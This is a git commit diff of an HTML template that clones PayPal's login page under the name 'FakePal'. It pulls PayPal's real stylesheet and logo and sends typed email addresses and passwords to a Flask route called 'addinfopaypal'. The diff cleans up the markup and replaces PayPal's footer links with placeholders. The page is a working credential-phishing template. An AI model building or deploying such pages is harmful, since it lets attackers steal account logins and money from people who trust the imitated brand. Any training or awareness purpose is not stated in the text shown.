This commit is contained in:
√(noham)²
2023-04-07 23:15:56 +02:00
parent 6c30975f67
commit ebe21a776f
20 changed files with 396 additions and 306 deletions

View File

@@ -1,13 +1,5 @@
<!--
<!DOCTYPE html>
<!--[if lt IE 9]><html lang="en" class="no-js lower-than-ie9 ie desktop"><![endif]-->
<!--[if lt IE 10]><html lang="en" class="no-js lower-than-ie10 ie desktop"><![endif]-->
<!--[if !IE]>-->
<html lang="en">
<!--<![endif]-->
<head>
<!--Script info: script: node, template: , date: Nov 21, 2022 01:40:18 -08:00, country: TW, language: en web version: content version: hostname : rZJvnqaaQhLn/nmWT8cSUm+72VQ7inHLmNSWW7oQxSqkM7CaNNY3vwwDZDVc+NwN rlogid : rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfVANbpv53MZEySepZVSpTWRYJ8c9hOdmTcn%2BHSxZ2SMb_184998f5480 -->
<meta charset="utf-8">
<title>Log in to your FakePal account</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
@@ -27,7 +19,6 @@
<meta property="og:image" content="https://www.paypalobjects.com/webstatic/icon/pp258.png">
<link rel="stylesheet"
href="https://www.paypalobjects.com/web/res/814/0ed5dab5e678c14296dd49b2a68b4/css/contextualLoginElementalUIv2.css">
</head>
<body>
@@ -51,52 +42,35 @@
<p id="pwdSubTagLine" class="subHeaderText ">With a FakePal account, you're eligible for Purchase Protection
and Rewards.</p>
<div class="notifications"></div>
<!-- form -->
<!-- <form action="{{ url_for('addinfopaypal')}}" method="post" id="FormPaypalInformation"></form> -->
<form action="{{ url_for('addinfopaypal')}}" method="post">
<!-- passwordSection -->
<div id="passwordSection" class="clearfix splitEmail">
<div id="splitEmailSection" class="splitPhoneSection splitEmailSection">
<div class="textInput" id="login_emaildiv" style="z-index: 1;">
<div class="fieldWrapper">
<!-- input -->
<input id="email" name="email" type="email" class="hasHelp validate validateEmpty "
required="required" autocomplete="username" placeholder="Email or mobile number"
aria-describedby="emailErrorMessage">
<input id="email" name="email" type="email" class="hasHelp validate validateEmpty " required="required" autocomplete="username" placeholder="Email or mobile number" aria-describedby="emailErrorMessage">
<!-- label -->
<label for="email" class="fieldLabel">Email or mobile number</label>
<label for="email" class="fieldLabel">Email</label>
</div>
</div>
</div>
<div id="passwordSection" class="clearfix showHideButtonForEligibleBrowser">
<div class="textInput " id="login_passworddiv" style="z-index: 1;">
<div class="fieldWrapper">
<!-- input -->
<input id="password" name="password" type="password"
class="hasHelp validateEmpty pin-password" required="required" value="" placeholder="Password"
aria-describedby="passwordErrorMessage">
<input id="password" name="password" type="password" class="hasHelp validateEmpty pin-password" required="required" value="" placeholder="Password" aria-describedby="passwordErrorMessage">
<!-- label -->
<label for="password" class="fieldLabel">Password</label>
<label for="Show password" class="fieldLabel">Show password</label>
</div>
</div>
<a href="#" id="forgotPassword" class="recoveryOption forgotPassword"
data-client-log-action-type="clickForgotPasswordLink" pa-marked="1">Forgot password?</a>
<a href="#" id="forgotPassword" class="recoveryOption forgotPassword" data-client-log-action-type="clickForgotPasswordLink" pa-marked="1">Forgot password?</a>
</div>
</div>
<!-- button -->
<div class="actions">
<button class="button actionContinue scTrack:unifiedlogin-login-submit" type="submit" id="btnLogin"
name="btnLogin" value="Login" pa-marked="1">Log In</button>
<button class="button actionContinue scTrack:unifiedlogin-login-submit" type="submit" id="btnLogin" name="btnLogin" value="Login" pa-marked="1">Log In</button>
</div>
</form>
<div id="tryAnotherWayLinkContainer" class="tryAnotherWayLinkContainer " data-hide-on-pass="">
@@ -127,26 +101,25 @@
<div class="legalFooter">
<ul class="footerGroup">
<li>
<a target="_blank" href="https://www.paypal.com//smarthelp/contact-us" pa-marked="1">Contact Us</a>
<a target="_blank" href="#" pa-marked="1">Contact Us</a>
</li>
<li>
<a target="_blank" href="https://www.paypal.com//webapps/mpp/ua/privacy-full" pa-marked="1">Privacy</a>
<a target="_blank" href="#" pa-marked="1">Privacy</a>
</li>
<li>
<a target="_blank" href="https://www.paypal.com//webapps/mpp/ua/legalhub-full" pa-marked="1">Legal</a>
<a target="_blank" href="#" pa-marked="1">Legal</a>
</li>
<li>
<a target="_blank" href="https://www.paypal.com//webapps/mpp/ua/upcoming-policies-full" pa-marked="1">Policy
<a target="_blank" href="#" pa-marked="1">Policy
Updates</a>
</li>
<li>
<a target="_blank" href="" pa-marked="1">Worldwide</a>
<a target="_blank" href="#" pa-marked="1">Worldwide</a>
</li>
</ul>
</div>
</footer>
</div>
</body>
</html>